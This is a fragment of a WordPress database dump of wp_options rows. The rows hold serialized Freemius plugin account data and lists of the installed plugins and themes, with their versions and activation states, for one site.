(25337,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:20:\"ay.zaghweb@gmail.com\";s:7:\"version\";s:5:\"6.3.2\";s:9:\"timestamp\";i:1697165583;}','no'),
(49118,'awb_general','','yes'),
(49119,'awb_pro','','yes'),
(56513,'fs_active_plugins','O:8:\"stdClass\":3:{s:7:\"plugins\";a:1:{s:32:\"ultimate-blocks/library/freemius\";O:8:\"stdClass\":4:{s:7:\"version\";s:6:\"2.5.10\";s:4:\"type\";s:6:\"plugin\";s:9:\"timestamp\";i:1693461085;s:11:\"plugin_path\";s:35:\"ultimate-blocks/ultimate-blocks.php\";}}s:7:\"abspath\";s:42:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/\";s:6:\"newest\";O:8:\"stdClass\":5:{s:11:\"plugin_path\";s:35:\"ultimate-blocks/ultimate-blocks.php\";s:8:\"sdk_path\";s:32:\"ultimate-blocks/library/freemius\";s:7:\"version\";s:6:\"2.5.10\";s:13:\"in_activation\";b:0;s:9:\"timestamp\";i:1693461085;}}','yes'),
(56514,'fs_debug_mode','','yes'),
(56515,'fs_accounts','a:13:{s:21:\"id_slug_type_path_map\";a:2:{i:2086;a:2:{s:4:\"slug\";s:18:\"add-search-to-menu\";s:4:\"type\";s:6:\"plugin\";}i:1798;a:3:{s:4:\"slug\";s:15:\"ultimate-blocks\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:35:\"ultimate-blocks/ultimate-blocks.php\";}}s:11:\"plugin_data\";a:2:{s:18:\"add-search-to-menu\";a:17:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:9:\"prev_path\";s:41:\"add-search-to-menu/add-search-to-menu.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1668203395;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";s:5:\"2.4.5\";s:11:\"sdk_version\";s:5:\"2.5.3\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";s:6:\"5.4.10\";s:14:\"plugin_version\";s:3:\"5.5\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:11:\"gsw2023.com\";s:9:\"server_ip\";s:14:\"62.114.152.200\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1668203395;s:7:\"version\";s:6:\"5.4.10\";}s:15:\"prev_is_premium\";b:0;s:12:\"is_anonymous\";a:3:{s:2:\"is\";b:1;s:9:\"timestamp\";i:1668203547;s:7:\"version\";s:6:\"5.4.10\";}s:16:\"uninstall_reason\";O:8:\"stdClass\":3:{s:2:\"id\";s:1:\"1\";s:4:\"info\";s:0:\"\";s:12:\"is_anonymous\";b:0;}}s:15:\"ultimate-blocks\";a:23:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:35:\"ultimate-blocks/ultimate-blocks.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1692944488;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:1;s:16:\"sdk_last_version\";N;s:11:\"sdk_version\";s:6:\"2.5.10\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";N;s:14:\"plugin_version\";s:5:\"3.0.2\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:11:\"gsw2023.com\";s:9:\"server_ip\";N;s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1692944504;s:7:\"version\";s:5:\"3.0.2\";}s:15:\"prev_is_premium\";b:0;s:30:\"is_diagnostic_tracking_allowed\";b:1;s:30:\"is_extensions_tracking_allowed\";b:1;s:14:\"has_trial_plan\";b:0;s:19:\"keepalive_timestamp\";i:1697794717;s:20:\"activation_timestamp\";i:1692944504;s:9:\"sync_cron\";O:8:\"stdClass\":5:{s:7:\"version\";s:5:\"3.0.2\";s:7:\"blog_id\";i:0;s:11:\"sdk_version\";s:6:\"2.5.10\";s:9:\"timestamp\";i:1692944508;s:2:\"on\";b:1;}s:14:\"sync_timestamp\";i:1698140303;s:22:\"install_sync_timestamp\";i:1697794717;}}s:13:\"file_slug_map\";a:2:{s:41:\"add-search-to-menu/add-search-to-menu.php\";s:18:\"add-search-to-menu\";s:35:\"ultimate-blocks/ultimate-blocks.php\";s:15:\"ultimate-blocks\";}s:7:\"plugins\";a:2:{s:18:\"add-search-to-menu\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";N;s:5:\"title\";s:12:\"Ivory Search\";s:4:\"slug\";s:18:\"add-search-to-menu\";s:12:\"premium_slug\";s:26:\"add-search-to-menu-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";s:8:\"selected\";s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:41:\"add-search-to-menu/add-search-to-menu.php\";s:7:\"version\";s:3:\"5.5\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_e05b040b84ff5014d0f0955127743\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"2086\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:15:\"ultimate-blocks\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";N;s:5:\"title\";s:15:\"Ultimate Blocks\";s:4:\"slug\";s:15:\"ultimate-blocks\";s:12:\"premium_slug\";s:19:\"ultimate-blocks-pro\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:35:\"ultimate-blocks/ultimate-blocks.php\";s:7:\"version\";s:5:\"3.0.2\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:3:\"pro\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_bd3d3c8e255543256632fd4bb9842\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"1798\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:9:\"unique_id\";s:32:\"3070b2d4eefc4f346046f8ac9904df20\";s:13:\"admin_notices\";a:1:{s:18:\"add-search-to-menu\";a:0:{}}s:5:\"plans\";a:1:{s:15:\"ultimate-blocks\";a:1:{i:0;O:14:\"FS_Plugin_Plan\":21:{s:9:\"plugin_id\";s:8:\"MTc5OA==\";s:4:\"name\";s:8:\"ZnJlZQ==\";s:5:\"title\";s:8:\"RnJlZQ==\";s:11:\"description\";s:20:\"RnJlZSBmb3JldmVyIQ==\";s:17:\"is_free_localhost\";s:4:\"MQ==\";s:17:\"is_block_features\";s:4:\"MQ==\";s:12:\"license_type\";s:4:\"MA==\";s:16:\"is_https_support\";s:0:\"\";s:12:\"trial_period\";N;s:23:\"is_require_subscription\";s:0:\"\";s:10:\"support_kb\";N;s:13:\"support_forum\";N;s:13:\"support_email\";N;s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";s:0:\"\";s:11:\"is_featured\";s:0:\"\";s:2:\"id\";s:8:\"MjEzNDk=\";s:7:\"updated\";N;s:7:\"created\";s:28:\"MjAyMy0wNS0wOCAwNjoyMTo0OA==\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}}s:14:\"active_plugins\";O:8:\"stdClass\":3:{s:9:\"timestamp\";i:1698140303;s:3:\"md5\";s:32:\"1ddb26c432db7fc14cdd37a2977de321\";s:7:\"plugins\";a:20:{s:45:\"advanced-backgrounds/advanced-backgrounds.php\";a:5:{s:4:\"slug\";s:20:\"advanced-backgrounds\";s:7:\"version\";s:6:\"1.10.0\";s:5:\"title\";s:30:\"Advanced WordPress Backgrounds\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:25:\"fluentform/fluentform.php\";a:5:{s:4:\"slug\";s:10:\"fluentform\";s:7:\"version\";s:5:\"5.0.7\";s:5:\"title\";s:12:\"Fluent Forms\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:25:\"go_pricing/go_pricing.php\";a:5:{s:4:\"slug\";s:10:\"go_pricing\";s:7:\"version\";s:6:\"3.3.19\";s:5:\"title\";s:48:\"Go Pricing - WordPress Responsive Pricing Tables\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:29:\"pdf-embedder/pdf_embedder.php\";a:5:{s:4:\"slug\";s:12:\"pdf-embedder\";s:7:\"version\";s:5:\"4.6.4\";s:5:\"title\";s:12:\"PDF Embedder\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:38:\"recent-tweets-widget/recent-tweets.php\";a:5:{s:4:\"slug\";s:20:\"recent-tweets-widget\";s:7:\"version\";s:5:\"1.6.8\";s:5:\"title\";s:20:\"Recent Tweets Widget\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:35:\"google-site-kit/google-site-kit.php\";a:5:{s:4:\"slug\";s:15:\"google-site-kit\";s:7:\"version\";s:6:\"1.96.0\";s:5:\"title\";s:18:\"Site Kit by Google\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:23:\"revslider/revslider.php\";a:5:{s:4:\"slug\";s:9:\"revslider\";s:7:\"version\";s:6:\"6.5.19\";s:5:\"title\";s:17:\"Slider Revolution\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:21:\"the7-cli/the7-cli.php\";a:5:{s:4:\"slug\";s:8:\"the7-cli\";s:7:\"version\";s:5:\"1.0.0\";s:5:\"title\";s:8:\"The7 CLI\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:29:\"dt-the7-core/dt-the7-core.php\";a:5:{s:4:\"slug\";s:12:\"dt-the7-core\";s:7:\"version\";s:5:\"2.6.1\";s:5:\"title\";s:13:\"The7 Elements\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:35:\"ultimate-blocks/ultimate-blocks.php\";a:5:{s:4:\"slug\";s:15:\"ultimate-blocks\";s:7:\"version\";s:5:\"3.0.2\";s:5:\"title\";s:15:\"Ultimate Blocks\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:29:\"use-any-font/use-any-font.php\";a:5:{s:4:\"slug\";s:12:\"use-any-font\";s:7:\"version\";s:6:\"6.3.01\";s:5:\"title\";s:12:\"Use Any Font\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:16:\"v-form/vform.php\";a:5:{s:4:\"slug\";s:6:\"v-form\";s:7:\"version\";s:3:\"2.0\";s:5:\"title\";s:5:\"Vform\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:32:\"wp-google-fonts/google-fonts.php\";a:5:{s:4:\"slug\";s:15:\"wp-google-fonts\";s:7:\"version\";s:5:\"3.1.5\";s:5:\"title\";s:15:\"WP Google Fonts\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:33:\"duplicate-post/duplicate-post.php\";a:5:{s:4:\"slug\";s:14:\"duplicate-post\";s:7:\"version\";s:3:\"4.5\";s:5:\"title\";s:20:\"Yoast Duplicate Post\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:33:\"classic-editor/classic-editor.php\";a:16:{s:4:\"Name\";s:14:\"Classic Editor\";s:9:\"PluginURI\";s:45:\"https://wordpress.org/plugins/classic-editor/\";s:7:\"Version\";s:5:\"1.6.3\";s:11:\"Description\";s:154:\"Enables the WordPress classic editor and the old-style Edit Post screen with TinyMCE, Meta Boxes, etc. Supports the older plugins that extend this screen.\";s:6:\"Author\";s:22:\"WordPress Contributors\";s:9:\"AuthorURI\";s:44:\"https://github.com/WordPress/classic-editor/\";s:10:\"TextDomain\";s:14:\"classic-editor\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:3:\"4.9\";s:11:\"RequiresPHP\";s:5:\"5.2.4\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:14:\"Classic Editor\";s:10:\"AuthorName\";s:22:\"WordPress Contributors\";s:9:\"is_active\";b:1;s:4:\"slug\";s:14:\"classic-editor\";}s:41:\"Ultimate_VC_Addons/Ultimate_VC_Addons.php\";a:5:{s:4:\"slug\";s:18:\"Ultimate_VC_Addons\";s:7:\"version\";s:7:\"3.19.11\";s:5:\"title\";s:41:\"Ultimate Addons for WPBakery Page Builder\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:27:\"js_composer/js_composer.php\";a:5:{s:4:\"slug\";s:11:\"js_composer\";s:7:\"version\";s:5:\"6.8.0\";s:5:\"title\";s:21:\"WPBakery Page Builder\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:31:\"wp-all-export/wp-all-export.php\";a:5:{s:4:\"slug\";s:13:\"wp-all-export\";s:7:\"version\";s:5:\"1.3.9\";s:5:\"title\";s:13:\"WP All Export\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:21:\"filebird/filebird.php\";a:5:{s:4:\"slug\";s:8:\"filebird\";s:7:\"version\";s:3:\"5.5\";s:5:\"title\";s:13:\"FileBird Lite\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:47:\"file-manager-advanced/file_manager_advanced.php\";a:5:{s:4:\"slug\";s:21:\"file-manager-advanced\";s:7:\"version\";s:5:\"5.1.1\";s:5:\"title\";s:21:\"File Manager Advanced\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}}}s:11:\"all_plugins\";O:8:\"stdClass\":3:{s:9:\"timestamp\";i:1693906722;s:3:\"md5\";s:32:\"8ee21db918a1cca1aa91ac1309d75b14\";s:7:\"plugins\";a:48:{s:45:\"advanced-backgrounds/advanced-backgrounds.php\";a:6:{s:4:\"slug\";s:20:\"advanced-backgrounds\";s:7:\"version\";s:6:\"1.10.0\";s:5:\"title\";s:30:\"Advanced WordPress Backgrounds\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:6:\"1.11.4\";}s:33:\"classic-editor/classic-editor.php\";a:5:{s:4:\"slug\";s:14:\"classic-editor\";s:7:\"version\";s:5:\"1.6.3\";s:5:\"title\";s:14:\"Classic Editor\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:27:\"coming-soon/coming-soon.php\";a:5:{s:4:\"slug\";s:11:\"coming-soon\";s:7:\"version\";s:9:\"6.15.13.1\";s:5:\"title\";s:89:\"Coming Soon Page, Maintenance Mode, Landing Pages & WordPress Website Builder by SeedProd\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:36:\"contact-form-7/wp-contact-form-7.php\";a:6:{s:4:\"slug\";s:14:\"contact-form-7\";s:7:\"version\";s:7:\"5.7.5.1\";s:5:\"title\";s:14:\"Contact Form 7\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:3:\"5.8\";}s:42:\"contact-form-cfdb7/contact-form-cfdb-7.php\";a:5:{s:4:\"slug\";s:18:\"contact-form-cfdb7\";s:7:\"version\";s:7:\"1.2.6.7\";s:5:\"title\";s:18:\"Contact Form CFDB7\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:27:\"convertplug/convertplug.php\";a:5:{s:4:\"slug\";s:11:\"convertplug\";s:7:\"version\";s:6:\"3.5.24\";s:5:\"title\";s:12:\"Convert Plus\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:39:\"disable-gutenberg/disable-gutenberg.php\";a:5:{s:4:\"slug\";s:17:\"disable-gutenberg\";s:7:\"version\";s:3:\"3.0\";s:5:\"title\";s:17:\"Disable Gutenberg\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:39:\"easy-google-fonts/easy-google-fonts.php\";a:5:{s:4:\"slug\";s:17:\"easy-google-fonts\";s:7:\"version\";s:5:\"2.0.4\";s:5:\"title\";s:17:\"Easy Google Fonts\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:23:\"elementor/elementor.php\";a:6:{s:4:\"slug\";s:9:\"elementor\";s:7:\"version\";s:6:\"3.12.0\";s:5:\"title\";s:9:\"Elementor\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:6:\"3.15.3\";}s:25:\"fluentform/fluentform.php\";a:6:{s:4:\"slug\";s:10:\"fluentform\";s:7:\"version\";s:5:\"5.0.7\";s:5:\"title\";s:12:\"Fluent Forms\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"5.0.8\";}s:45:\"olympus-google-fonts/olympus-google-fonts.php\";a:6:{s:4:\"slug\";s:20:\"olympus-google-fonts\";s:7:\"version\";s:5:\"3.3.7\";s:5:\"title\";s:38:\"Fonts Plugin | Google Fonts Typography\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"3.4.4\";}s:25:\"formidable/formidable.php\";a:6:{s:4:\"slug\";s:10:\"formidable\";s:7:\"version\";s:5:\"6.4.1\";s:5:\"title\";s:16:\"Formidable Forms\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"6.4.2\";}s:13:\"give/give.php\";a:6:{s:4:\"slug\";s:4:\"give\";s:7:\"version\";s:6:\"2.25.3\";s:5:\"title\";s:22:\"Give - Donation Plugin\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:6:\"2.32.0\";}s:50:\"google-analytics-for-wordpress/googleanalytics.php\";a:6:{s:4:\"slug\";s:30:\"google-analytics-for-wordpress\";s:7:\"version\";s:4:\"8.18\";s:5:\"title\";s:49:\"Google Analytics for WordPress by MonsterInsights\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:4:\"8.19\";}s:25:\"go_pricing/go_pricing.php\";a:6:{s:4:\"slug\";s:10:\"go_pricing\";s:7:\"version\";s:6:\"3.3.19\";s:5:\"title\";s:48:\"Go Pricing - WordPress Responsive Pricing Tables\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:3:\"3.4\";}s:9:\"hello.php\";a:5:{s:4:\"slug\";s:11:\"hello-dolly\";s:7:\"version\";s:5:\"1.7.2\";s:5:\"title\";s:11:\"Hello Dolly\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:41:\"add-search-to-menu/add-search-to-menu.php\";a:5:{s:4:\"slug\";s:18:\"add-search-to-menu\";s:7:\"version\";s:3:\"5.5\";s:5:\"title\";s:12:\"Ivory Search\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:42:\"add-search-to-menu/add-search-to-menuh.php\";a:5:{s:4:\"slug\";s:18:\"add-search-to-menu\";s:7:\"version\";s:3:\"5.5\";s:5:\"title\";s:12:\"Ivory Search\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:22:\"mity-pro/pros-cons.php\";a:5:{s:4:\"slug\";s:16:\"mighty-pros-cons\";s:7:\"version\";s:5:\"1.2.6\";s:5:\"title\";s:18:\"Mighty Pros & Cons\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:37:\"optinmonster/optin-monster-wp-api.php\";a:6:{s:4:\"slug\";s:12:\"optinmonster\";s:7:\"version\";s:6:\"2.13.7\";s:5:\"title\";s:12:\"OptinMonster\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:6:\"2.13.8\";}s:29:\"pdf-embedder/pdf_embedder.php\";a:5:{s:4:\"slug\";s:12:\"pdf-embedder\";s:7:\"version\";s:5:\"4.6.4\";s:5:\"title\";s:12:\"PDF Embedder\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:26:\"seoplugins/linkpreview.php\";a:5:{s:4:\"slug\";s:11:\"linkpreview\";s:7:\"version\";s:5:\"1.6.7\";s:5:\"title\";s:19:\"Phee\'s Link Preview\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:35:\"protect-uploads/protect-uploads.php\";a:6:{s:4:\"slug\";s:15:\"protect-uploads\";s:7:\"version\";s:3:\"0.4\";s:5:\"title\";s:15:\"Protect Uploads\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"0.5.2\";}s:27:\"rafflepress/rafflepress.php\";a:5:{s:4:\"slug\";s:11:\"rafflepress\";s:7:\"version\";s:6:\"1.11.4\";s:5:\"title\";s:16:\"RafflePress Lite\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:38:\"recent-tweets-widget/recent-tweets.php\";a:5:{s:4:\"slug\";s:20:\"recent-tweets-widget\";s:7:\"version\";s:5:\"1.6.8\";s:5:\"title\";s:20:\"Recent Tweets Widget\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:35:\"google-site-kit/google-site-kit.php\";a:6:{s:4:\"slug\";s:15:\"google-site-kit\";s:7:\"version\";s:6:\"1.96.0\";s:5:\"title\";s:18:\"Site Kit by Google\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:7:\"1.107.0\";}s:23:\"revslider/revslider.php\";a:6:{s:4:\"slug\";s:9:\"revslider\";s:7:\"version\";s:6:\"6.5.19\";s:5:\"title\";s:17:\"Slider Revolution\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:6:\"6.6.15\";}s:21:\"the7-cli/the7-cli.php\";a:5:{s:4:\"slug\";s:8:\"the7-cli\";s:7:\"version\";s:5:\"1.0.0\";s:5:\"title\";s:8:\"The7 CLI\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:29:\"dt-the7-core/dt-the7-core.php\";a:6:{s:4:\"slug\";s:12:\"dt-the7-core\";s:7:\"version\";s:5:\"2.6.1\";s:5:\"title\";s:13:\"The7 Elements\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"2.7.6\";}s:35:\"ultimate-blocks/ultimate-blocks.php\";a:5:{s:4:\"slug\";s:15:\"ultimate-blocks\";s:7:\"version\";s:5:\"3.0.2\";s:5:\"title\";s:15:\"Ultimate Blocks\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:29:\"use-any-font/use-any-font.php\";a:5:{s:4:\"slug\";s:12:\"use-any-font\";s:7:\"version\";s:6:\"6.3.01\";s:5:\"title\";s:12:\"Use Any Font\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:16:\"v-form/vform.php\";a:5:{s:4:\"slug\";s:6:\"v-form\";s:7:\"version\";s:3:\"2.0\";s:5:\"title\";s:5:\"Vform\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:32:\"white-label-cms/wlcms-plugin.php\";a:6:{s:4:\"slug\";s:15:\"white-label-cms\";s:7:\"version\";s:3:\"2.5\";s:5:\"title\";s:15:\"White Label CMS\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:3:\"2.6\";}s:24:\"wpforms-lite/wpforms.php\";a:5:{s:4:\"slug\";s:12:\"wpforms-lite\";s:7:\"version\";s:7:\"1.8.3.1\";s:5:\"title\";s:12:\"WPForms Lite\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:32:\"wp-google-fonts/google-fonts.php\";a:5:{s:4:\"slug\";s:15:\"wp-google-fonts\";s:7:\"version\";s:5:\"3.1.5\";s:5:\"title\";s:15:\"WP Google Fonts\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:33:\"duplicate-post/duplicate-post.php\";a:5:{s:4:\"slug\";s:14:\"duplicate-post\";s:7:\"version\";s:3:\"4.5\";s:5:\"title\";s:20:\"Yoast Duplicate Post\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:41:\"Ultimate_VC_Addons/Ultimate_VC_Addons.php\";a:6:{s:4:\"slug\";s:18:\"Ultimate_VC_Addons\";s:7:\"version\";s:7:\"3.19.11\";s:5:\"title\";s:41:\"Ultimate Addons for WPBakery Page Builder\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:7:\"3.19.14\";}s:27:\"js_composer/js_composer.php\";a:6:{s:4:\"slug\";s:11:\"js_composer\";s:7:\"version\";s:5:\"6.8.0\";s:5:\"title\";s:21:\"WPBakery Page Builder\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:3:\"7.0\";}s:42:\"stripe-payments/accept-stripe-payments.php\";a:5:{s:4:\"slug\";s:15:\"stripe-payments\";s:7:\"version\";s:6:\"2.0.78\";s:5:\"title\";s:22:\"Accept Stripe Payments\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:19:\"akismet/akismet.php\";a:5:{s:4:\"slug\";s:7:\"akismet\";s:7:\"version\";s:3:\"5.2\";s:5:\"title\";s:34:\"Akismet Anti-Spam: Spam Protection\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:28:\"fast-velocity-minify/fvm.php\";a:5:{s:4:\"slug\";s:20:\"fast-velocity-minify\";s:7:\"version\";s:5:\"3.4.0\";s:5:\"title\";s:20:\"Fast Velocity Minify\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:56:\"motopress-hotel-booking-lite/motopress-hotel-booking.php\";a:5:{s:4:\"slug\";s:28:\"motopress-hotel-booking-lite\";s:7:\"version\";s:5:\"4.7.4\";s:5:\"title\";s:18:\"Hotel Booking Lite\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:51:\"ti-woocommerce-wishlist/ti-woocommerce-wishlist.php\";a:5:{s:4:\"slug\";s:23:\"ti-woocommerce-wishlist\";s:7:\"version\";s:5:\"2.7.4\";s:5:\"title\";s:23:\"TI WooCommerce Wishlist\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:41:\"wordpress-importer/wordpress-importer.php\";a:5:{s:4:\"slug\";s:18:\"wordpress-importer\";s:7:\"version\";s:5:\"0.8.1\";s:5:\"title\";s:18:\"WordPress Importer\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:24:\"wordpress-seo/wp-seo.php\";a:5:{s:4:\"slug\";s:13:\"wordpress-seo\";s:7:\"version\";s:4:\"21.0\";s:5:\"title\";s:9:\"Yoast SEO\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:31:\"wp-all-export/wp-all-export.php\";a:5:{s:4:\"slug\";s:13:\"wp-all-export\";s:7:\"version\";s:5:\"1.3.9\";s:5:\"title\";s:13:\"WP All Export\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:21:\"filebird/filebird.php\";a:5:{s:4:\"slug\";s:8:\"filebird\";s:7:\"version\";s:3:\"5.5\";s:5:\"title\";s:13:\"FileBird Lite\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:47:\"file-manager-advanced/file_manager_advanced.php\";a:5:{s:4:\"slug\";s:21:\"file-manager-advanced\";s:7:\"version\";s:5:\"5.1.1\";s:5:\"title\";s:21:\"File Manager Advanced\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}}}s:10:\"all_themes\";O:8:\"stdClass\":3:{s:9:\"timestamp\";i:1698140303;s:3:\"md5\";s:32:\"b4d6009c368e7a1623de398a858e166c\";s:6:\"themes\";a:7:{s:13:\"consultstreet\";a:5:{s:4:\"slug\";s:13:\"consultstreet\";s:7:\"version\";s:5:\"2.5.1\";s:5:\"title\";s:13:\"ConsultStreet\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:7:\"dt-the7\";a:5:{s:4:\"slug\";s:7:\"dt-the7\";s:7:\"version\";s:6:\"11.7.3\";s:5:\"title\";s:4:\"The7\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:12:\"twentytwenty\";a:5:{s:4:\"slug\";s:12:\"twentytwenty\";s:7:\"version\";s:3:\"2.2\";s:5:\"title\";s:13:\"Twenty Twenty\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:15:\"twentytwentyone\";a:5:{s:4:\"slug\";s:15:\"twentytwentyone\";s:7:\"version\";s:3:\"1.9\";s:5:\"title\";s:17:\"Twenty Twenty-One\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:17:\"twentytwentythree\";a:5:{s:4:\"slug\";s:17:\"twentytwentythree\";s:7:\"version\";s:3:\"1.2\";s:5:\"title\";s:19:\"Twenty 